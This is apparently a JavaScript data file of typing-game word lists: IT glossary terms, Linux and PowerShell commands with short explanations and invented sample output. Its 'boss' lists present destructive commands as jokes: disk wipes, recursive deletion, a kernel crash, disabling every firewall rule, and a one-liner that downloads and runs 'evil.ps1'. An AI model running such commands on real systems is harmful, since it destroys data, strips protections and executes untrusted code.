// Word sets for Spellcheck. Each entry is [text to type, what it does, ...sample output lines].
// basic:    shown on every pace
// advanced: pipelines, flags and multi-word terms; mixed in on normal, favored on on-call
// boss:     what the legacy mainframe makes you type
// Sample output is illustrative: documentation IP ranges, made-up hosts, plausible numbers.
window.SPELLCHECK_WORDS = {
    it: {
        label: 'it terms',
        prompt: 'wizard@spellbook:~$ ',
        verb: 'whatis ',
        basic: [
            ['ping', 'send an ICMP echo to see if a host answers, and how fast'],
            ['dns', 'the internet phonebook: turns names like oldweb.tech into IP addresses'],
            ['ssh', 'encrypted remote shell, usually on TCP port 22'],
            ['vlan', 'splits one physical switch into separate layer-2 networks'],
            ['nat', 'rewrites private addresses to a public one at the edge'],
            ['mtu', 'largest packet a link carries without fragmenting; 1500 bytes on Ethernet'],
            ['tcp', 'reliable, ordered transport: handshakes, acks, retransmits'],
            ['udp', 'fire-and-forget transport: fast, no delivery guarantee'],
            ['dhcp', 'hands out IP addresses, gateways and DNS servers automatically'],
            ['vpn', 'an encrypted tunnel across an untrusted network'],
            ['acl', 'an ordered list of permit and deny rules'],
            ['raid', 'combines disks for speed, redundancy, or both'],
            ['nas', 'file storage shared over the network (SMB, NFS)'],
            ['arp', 'maps an IPv4 address to a MAC address on the local segment'],
            ['ldap', 'protocol for querying directories like Active Directory'],
            ['cron', 'the Unix scheduler that runs jobs on a timetable'],
            ['subnet', 'a block of IP addresses carved out of a larger network'],
            ['kernel', 'the core of the OS: talks to hardware, schedules processes'],
            ['daemon', 'a background service, like sshd or nginx'],
            ['router', 'moves packets between networks using a routing table'],
            ['switch', 'forwards frames inside a network using MAC addresses'],
            ['patch', 'an update that fixes bugs or security holes'],
            ['backup', 'a copy you can restore from. untested backups are wishes'],
            ['proxy', 'a middleman that makes requests on a client\'s behalf'],
            ['firewall', 'filters traffic by rules: ports, addresses, apps'],
            ['gateway', 'the next hop out of your subnet, usually the router'],
            ['latency', 'how long a packet takes to get there, in milliseconds'],
            ['uptime', 'how long a system has run since its last reboot'],
            ['cluster', 'several machines working as one for scale or failover'],
            ['hotfix', 'an urgent patch shipped outside the normal release'],
            ['runbook', 'step-by-step instructions for a routine or an incident'],
            ['outage', 'when the service is down and the phones light up'],
            ['bandwidth', 'how much data a link can carry per second'],
            ['rollback', 'undoing a change to get back to the last good state'],
            ['failover', 'switching to a standby system when the primary dies'],
            ['helpdesk', 'first line of support: tickets, resets, have you tried rebooting'],
            ['monitor', 'watching metrics and logs so problems page you first']
        ],
        advanced: [
            ['bgp', 'the routing protocol that glues the internet\'s networks together'],
            ['ospf', 'link-state routing inside one organization\'s network'],
            ['multicast', 'one sender, many receivers, sent once'],
            ['hypervisor', 'software that runs virtual machines on shared hardware'],
            ['kubernetes', 'orchestrates containers: scheduling, scaling, self-healing'],
            ['certificate', 'binds a public key to a name, signed by a trusted CA'],
            ['traceroute', 'lists every router hop between you and a destination'],
            ['replication', 'keeping copies of data in sync across systems'],
            ['idempotent', 'safe to run twice: the second run changes nothing'],
            ['observability', 'logs, metrics and traces that explain why, not just what'],
            ['spanning tree', 'blocks redundant switch links so frames don\'t loop forever'],
            ['zero trust', 'never trust the network; verify every user and device, every time'],
            ['least privilege', 'give every account only the access it needs'],
            ['split brain', 'both cluster nodes think they\'re primary. data diverges. pain'],
            ['load balancer', 'spreads requests across servers and drops dead ones'],
            ['jumbo frames', 'Ethernet frames up to 9000 bytes, common on storage networks'],
            ['root cause analysis', 'finding why it broke, not just what broke'],
            ['defense in depth', 'layered controls so one failure isn\'t a breach'],
            ['change advisory board', 'the meeting that approves your maintenance window'],
            ['service level agreement', 'the uptime you promised, in writing'],
            ['single point of failure', 'the one box that takes everything down with it'],
            ['mean time to recovery', 'how long it takes to fix things, on average'],
            ['infrastructure as code', 'servers and networks defined in version-controlled files'],
            ['network segmentation', 'splitting the network so a breach can\'t spread']
        ],
        boss: [
            ['legacy', 'it works. nobody knows why. nobody may touch it'],
            ['mainframe', 'still running payroll since 1987'],
            ['cobol', 'the language under half the world\'s banking'],
            ['end of life', 'no more patches from the vendor, ever'],
            ['technical debt', 'every shortcut, with interest'],
            ['vendor lock-in', 'leaving would cost more than staying'],
            ['undocumented', 'the only manual retired in 2009']
        ]
    },

    linux: {
        label: 'linux',
        prompt: 'admin@dc01:~$ ',
        verb: '',
        basic: [
            ['ls', 'list files in the current directory', 'backups  deploy.sh  logs  notes.txt'],
            ['pwd', 'print the directory you are in', '/home/admin'],
            ['whoami', 'print the user you are logged in as', 'admin'],
            ['hostname', 'print this machine\'s name', 'dc01'],
            ['date', 'print the current date and time', 'Mon Oct  5 03:14:02 UTC 2026'],
            ['uptime', 'time since boot, users, and load averages', ' 03:14:02 up 412 days,  2 users,  load average: 0.08, 0.11, 0.09'],
            ['w', 'who is logged in and what they are running', 'admin  pts/0  10.0.0.5  03:01  bash'],
            ['ls -la', 'long listing, including hidden dotfiles', 'drwxr-x--- 5 admin admin 4096 Oct  5 .', '-rw------- 1 admin admin  812 Oct  5 .bash_history'],
            ['cd /var/log', 'change directory. no output means it worked'],
            ['df -h', 'free disk space per filesystem, human-readable', 'Filesystem  Size  Used Avail Use% Mounted on', '/dev/sda1    50G   21G   27G  44% /'],
            ['free -m', 'memory use in megabytes', '        total   used   free', 'Mem:    15890   6211   2304'],
            ['ps aux', 'every running process', 'USER   PID %CPU %MEM COMMAND', 'root     1  0.0  0.1 /sbin/init', 'www    812  1.2  2.4 nginx: worker'],
            ['top', 'live view of processes by CPU (q to quit)', 'Tasks: 214 total,   1 running', '%Cpu(s):  3.1 us,  0.9 sy, 95.8 id'],
            ['uname -a', 'kernel name, version and architecture', 'Linux dc01 6.8.0-45-generic x86_64 GNU/Linux'],
            ['ip addr', 'interfaces and their IP addresses', '2: eth0: <BROADCAST,UP> mtu 1500', '    inet 10.0.20.15/24 brd 10.0.20.255'],
            ['ip route', 'the routing table', 'default via 10.0.20.1 dev eth0', '10.0.20.0/24 dev eth0 proto kernel'],
            ['ping -c3 gw', 'send three pings to the gateway', '3 packets transmitted, 3 received, 0% packet loss', 'rtt min/avg/max = 0.41/0.52/0.70 ms'],
            ['ss -tlnp', 'listening TCP ports and the process on each', 'LISTEN 0 511 0.0.0.0:443  users:(("nginx",pid=812))', 'LISTEN 0 128 0.0.0.0:22   users:(("sshd",pid=644))'],
            ['history', 'your recent commands', '  501  sudo apt update', '  502  systemctl restart nginx'],
            ['crontab -l', 'list your scheduled jobs', '0 2 * * * /opt/backup.sh'],
            ['lsblk', 'block devices and their partitions', 'sda      8:0  0  50G  disk', '└─sda1   8:1  0  50G  part /'],
            ['du -sh /var/log', 'total size of a directory', '1.2G    /var/log'],
            ['mkdir -p backups', 'make a directory (and any parents). silent on success'],
            ['chmod 755 deploy.sh', 'owner can read/write/run; everyone else read/run'],
            ['kill 4242', 'ask process 4242 to stop (SIGTERM)'],
            ['git pull', 'fetch and merge the latest commits', 'Already up to date.'],
            ['sudo apt update', 'refresh the package list', 'Reading package lists... Done', '12 packages can be upgraded.'],
            ['cat /etc/hostname', 'print a file to the screen', 'dc01'],
            ['wc -l access.log', 'count lines in a file', '48213 access.log'],
            ['tail syslog', 'last 10 lines of a file', 'Oct  5 03:14:07 dc01 CRON[2231]: (root) CMD (/opt/backup.sh)'],
            ['man grep', 'open the manual page for a command', 'GREP(1)        User Commands        GREP(1)'],
            ['systemctl status sshd', 'is a service running, and since when', '● sshd.service - OpenSSH server daemon', '     Active: active (running) since Tue 2025-08-19'],
            ['tar -xzvf app.tar.gz', 'unpack a gzipped tarball, listing each file', 'app/', 'app/config.yml', 'app/server.js'],
            ['dig +short oldweb.tech', 'look up a name\'s IP address, nothing else', '203.0.113.7'],
            ['scp app.tar.gz web01:', 'copy a file to another host over SSH', 'app.tar.gz   100%   14MB  42.1MB/s   00:00']
        ],
        advanced: [
            ['ls -lt | head', 'newest files first, top ten only', '-rw-r--r-- 1 admin admin 48213 Oct  5 03:10 app.log'],
            ['who | wc -l', 'count logged-in sessions', '2'],
            ['ip -br a', 'one line per interface: state and address', 'lo    UNKNOWN  127.0.0.1/8', 'eth0  UP       10.0.20.15/24'],
            ['chmod u+x *.sh', 'make every shell script here executable for you. silent'],
            ['df -i /var', 'inode usage: you can run out of these before disk space', 'Filesystem  Inodes IUsed IFree IUse% Mounted on', '/dev/sda1     3.2M  412K  2.8M   13% /'],
            ['uname -r', 'just the kernel version', '6.8.0-45-generic'],
            ['ps aux | grep nginx', 'find processes by name', 'www    812  1.2  2.4 nginx: worker process'],
            ['grep -rn error /var/log', 'search every file under a directory; show line numbers', '/var/log/app.log:1042: error: db connection timeout'],
            ['du -sh * | sort -h', 'size of everything here, smallest to largest', '4.0K    notes.txt', '1.1G    backups'],
            ['tail -n 50 -f app.log', 'show the last 50 lines, then keep following', '03:14:09 INFO request served in 41ms'],
            ['find / -name "*.conf" -mtime -1', 'config files changed in the last day', '/etc/nginx/conf.d/site.conf'],
            ['journalctl -u nginx --since today', 'today\'s log entries for one service', 'Oct 05 03:10:01 dc01 systemd[1]: Reloaded nginx.service'],
            ['systemctl restart nginx', 'stop and start a service. silent if it worked'],
            ['ss -tulpn | grep :443', 'who is listening on port 443', 'tcp LISTEN 0 511 0.0.0.0:443 users:(("nginx",pid=812))'],
            ['awk \'{print $1}\' access.log | sort | uniq -c | sort -rn | head', 'top client IPs in a web log', '    912 203.0.113.7', '    544 198.51.100.23'],
            ['iptables -L -n -v', 'firewall rules with packet counters', 'Chain INPUT (policy DROP)', '  412 ACCEPT  tcp  --  *  *  0.0.0.0/0  dpt:22'],
            ['tcpdump -i eth0 port 53', 'capture DNS traffic on an interface', 'IP 10.0.20.15.40123 > 10.0.0.2.53: A? oldweb.tech'],
            ['docker ps --format "{{.Names}}"', 'just the names of running containers', 'web', 'db'],
            ['kubectl get pods -n prod', 'pods in the prod namespace', 'NAME            READY  STATUS', 'api-7d9f6       1/1    Running'],
            ['curl -sI https://oldweb.tech', 'fetch only the response headers', 'HTTP/2 200', 'content-type: text/html'],
            ['openssl x509 -in site.crt -noout -dates', 'when a certificate starts and expires', 'notBefore=Jul  1 00:00:00 2026 GMT', 'notAfter=Sep 29 23:59:59 2026 GMT'],
            ['rsync -avz /srv/ backup01:/srv/', 'sync a directory to another host, compressed', 'sent 1.2M bytes  received 4.1K bytes', 'total size is 2.3G  speedup is 1904.2'],
            ['lsof -i :8080', 'which process has port 8080 open', 'java  3121  app  41u  IPv6  TCP *:8080 (LISTEN)'],
            ['sed -i \'s/debug/info/\' app.conf', 'replace text inside a file in place. silent'],
            ['dmesg -T | tail -5', 'latest kernel messages with real timestamps', '[Mon Oct  5 02:58:11 2026] eth0: link up, 10Gbps'],
            ['ssh -J bastion admin@db01', 'hop through a jump host to reach an inner server', 'Last login: Sun Oct  4 22:01:13 2026 from 10.0.0.5'],
            ['nmap -sV 10.0.20.0/24', 'scan a subnet for open ports and service versions', '22/tcp   open  ssh    OpenSSH 9.6', '443/tcp  open  https  nginx 1.26'],
            ['find /tmp -mtime +7 -delete', 'delete temp files older than a week'],
            ['chown -R www:www /srv/app', 'give a whole tree to the web user. silent'],
            ['mount | grep /data', 'how a filesystem is mounted', '/dev/sdb1 on /data type xfs (rw,relatime)']
        ],
        boss: [
            ['rm -rf /', 'the classic. modern rm refuses without --no-preserve-root', 'rm: it is dangerous to operate recursively on \'/\''],
            ['chmod -R 777 /', 'every file writable by everyone. ssh will refuse to work after'],
            ['dd if=/dev/zero of=/dev/sda', 'overwrite the whole disk with zeros', 'dd: writing to \'/dev/sda\': No space left on device'],
            ['echo c > /proc/sysrq-trigger', 'tell the kernel to crash on purpose', 'Kernel panic - not syncing: sysrq triggered crash'],
            ['sudo shutdown -h now', 'power the server off immediately', 'System is going down for poweroff NOW!'],
            ['kill -9 1', 'SIGKILL to init. the kernel protects PID 1 from it']
        ]
    },

    powershell: {
        label: 'powershell',
        prompt: 'PS C:\\> ',
        verb: '',
        basic: [
            ['ls', 'alias for Get-ChildItem', 'Mode   LastWriteTime        Length Name', 'd----  10/5/2026  3:02 AM         logs'],
            ['gps', 'alias for Get-Process', '  Id ProcessName', '4412 pwsh'],
            ['gsv', 'alias for Get-Service', 'Status   Name      DisplayName', 'Running  W32Time   Windows Time'],
            ['cls', 'clear the screen'],
            ['Get-Date', 'current date and time', 'Monday, October 5, 2026 3:14:02 AM'],
            ['Get-Process', 'running processes', 'Handles  NPM(K)  PM(K)  WS(K)  CPU(s)    Id ProcessName', '    512      34  52112  61204   12.40  4412 pwsh'],
            ['Get-Service', 'services and their status', 'Status   Name      DisplayName', 'Running  W32Time   Windows Time', 'Stopped  Spooler   Print Spooler'],
            ['Get-ChildItem', 'files and folders here', 'Mode   LastWriteTime        Length Name', '-a---  10/5/2026  3:10 AM   48213 app.log'],
            ['Get-Content app.log', 'print a file', '2026-10-05 03:12:01 INFO service started'],
            ['Get-Help Get-Process', 'built-in help for a cmdlet', 'NAME', '    Get-Process', 'SYNOPSIS', '    Gets the processes running on the local computer.'],
            ['Test-Path C:\\Temp', 'does this path exist', 'True'],
            ['Set-Location C:\\Logs', 'change directory. silent on success'],
            ['Get-Alias ls', 'what an alias points to', 'Alias  ls -> Get-ChildItem'],
            ['Get-Command *dns*', 'find cmdlets by name', 'Cmdlet  Resolve-DnsName  DnsClient'],
            ['Get-HotFix', 'installed Windows updates', 'Source  Description      HotFixID   InstalledOn', 'DC01    Security Update  KB5044284  10/1/2026'],
            ['Get-Volume', 'disks and free space', 'DriveLetter FileSystem HealthStatus SizeRemaining   Size', 'C           NTFS       Healthy           61.2 GB 127 GB'],
            ['Restart-Service Spooler', 'restart the print spooler. it fixes more than it should'],
            ['Stop-Process -Id 4412', 'end a process by ID. silent'],
            ['Resolve-DnsName oldweb.tech', 'DNS lookup', 'Name         Type  TTL  Section  IPAddress', 'oldweb.tech  A     300  Answer   203.0.113.7'],
            ['Get-NetIPAddress', 'IP addresses on this machine', 'IPAddress    : 10.0.20.15', 'PrefixLength : 24'],
            ['Get-ExecutionPolicy', 'which scripts are allowed to run', 'RemoteSigned'],
            ['Get-ADUser jdoe', 'look up an Active Directory account', 'DistinguishedName : CN=John Doe,OU=Staff,DC=corp,DC=local', 'Enabled           : True'],
            ['Get-ScheduledTask', 'scheduled tasks and their state', 'TaskPath  TaskName  State', '\\         Backup    Ready'],
            ['Start-Transcript', 'record everything in this session to a file', 'Transcript started, output file is C:\\Users\\admin\\Documents\\PowerShell_transcript.txt'],
            ['Enter-PSSession dc02', 'open a remote PowerShell session', '[dc02]: PS C:\\Users\\admin\\Documents>'],
            ['New-Item -ItemType Directory backups', 'make a folder', 'Mode   LastWriteTime        Length Name', 'd----  10/5/2026  3:15 AM         backups'],
            ['Copy-Item app.config app.bak', 'copy a file. silent on success'],
            ['Test-NetConnection db01 -Port 1433', 'can I reach this port', 'ComputerName     : db01', 'TcpTestSucceeded : True']
        ],
        advanced: [
            ['gps | sort CPU', 'processes sorted by CPU, using aliases', 'Id    ProcessName  CPU', '2108  sqlservr     311.7'],
            ['gci -r *.log', 'find .log files in every subfolder', '-a---  10/5/2026  3:10 AM  48213 app.log'],
            ['ipconfig /all', 'the classic: every adapter, DNS server and lease', 'IPv4 Address. . . . . : 10.0.20.15(Preferred)', 'DNS Servers . . . . . : 10.0.0.2'],
            ['whoami /groups', 'which groups your token carries', 'CORP\\Domain Admins   Group   S-1-5-21-...-512'],
            ['(gps).Count', 'how many processes are running', '214'],
            ['Get-Date -f s', 'a sortable timestamp, handy for file names', '2026-10-05T03:14:02'],
            ['Get-Process | Sort-Object CPU -Descending | Select-Object -First 5', 'the five processes using the most CPU', 'sqlservr  2108  311.7', 'pwsh      4412   12.4'],
            ['Get-Service | Where-Object Status -eq Stopped', 'only the stopped services', 'Stopped  Spooler   Print Spooler'],
            ['Get-ChildItem -Recurse -Filter *.log', 'every .log file below here', '-a---  10/5/2026  3:10 AM  48213 app.log', '-a---  10/4/2026 11:58 PM   9120 iis.log'],
            ['Get-Content app.log -Tail 20 -Wait', 'last 20 lines, then keep following (like tail -f)', '2026-10-05 03:14:09 INFO request served in 41ms'],
            ['Get-WinEvent -LogName System -MaxEvents 5', 'newest five System event log entries', 'TimeCreated           Id LevelDisplayName Message', '10/5/2026 3:02:11 AM 7036 Information      The Print Spooler service entered the running state.'],
            ['Invoke-WebRequest https://oldweb.tech -UseBasicParsing', 'fetch a URL', 'StatusCode        : 200', 'StatusDescription : OK'],
            ['Invoke-Command -ComputerName web01 { Get-Service W3SVC }', 'run a command on a remote machine', 'Status   Name   DisplayName              PSComputerName', 'Running  W3SVC  World Wide Web Publishing web01'],
            ['Get-ADUser -Filter * -SearchBase "OU=Staff,DC=corp,DC=local"', 'every user in one OU', 'SamAccountName : jdoe', 'SamAccountName : asmith'],
            ['Get-ADComputer -Filter * | Measure-Object', 'count computer accounts in the domain', 'Count    : 412'],
            ['Get-Process | Get-Member', 'what properties and methods an object has', '   TypeName: System.Diagnostics.Process', 'Name  MemberType  Definition'],
            ['Get-Service | Export-Csv services.csv -NoTypeInformation', 'save the service list as a CSV. silent'],
            ['Get-Date | ConvertTo-Json', 'turn any object into JSON', '"2026-10-05T03:14:02.1234567-04:00"'],
            ['Test-NetConnection 8.8.8.8 -TraceRoute', 'ping plus every hop on the way', 'TraceRoute : 10.0.20.1', '             203.0.113.1', '             8.8.8.8'],
            ['Get-NetTCPConnection -State Listen', 'listening TCP ports', 'LocalAddress  LocalPort  State', '0.0.0.0       443        Listen'],
            ['Get-HotFix | Sort-Object InstalledOn -Descending | Select-Object -First 3', 'the three newest updates', 'KB5044284  10/1/2026', 'KB5043050  9/10/2026'],
            ['Get-CimInstance Win32_OperatingSystem', 'OS details through CIM', 'Caption : Microsoft Windows Server 2025 Datacenter', 'Version : 10.0.26100'],
            ['Restart-Computer -ComputerName web01 -Force -Wait', 'reboot a server and wait until it is back'],
            ['Get-ChildItem C:\\Logs | Where-Object LastWriteTime -lt (Get-Date).AddDays(-30)', 'log files older than 30 days', '-a---  8/12/2026  2:00 AM  1048576 iis-0812.log'],
            ['Install-Module PSWindowsUpdate -Scope CurrentUser', 'install a module from the PowerShell Gallery', 'Untrusted repository. Are you sure you want to install the modules from \'PSGallery\'?'],
            ['Set-ADAccountPassword jdoe -Reset', 'reset a user\'s password', 'Please enter the desired password for \'CN=John Doe,OU=Staff,DC=corp,DC=local\'']
        ],
        boss: [
            ['Set-ExecutionPolicy Unrestricted -Force', 'let every script run, signed or not'],
            ['Remove-Item C:\\ -Recurse -Force', 'delete the whole drive, no questions asked'],
            ['Disable-NetFirewallRule *', 'turn off every firewall rule at once'],
            ['Invoke-Expression (Invoke-WebRequest evil.ps1)', 'download code and run it without reading it'],
            ['Stop-Computer -Force', 'the server goes dark. hope it was the right one'],
            ['$ErrorActionPreference = "SilentlyContinue"', 'hide every error. what could go wrong']
        ]
    }
};
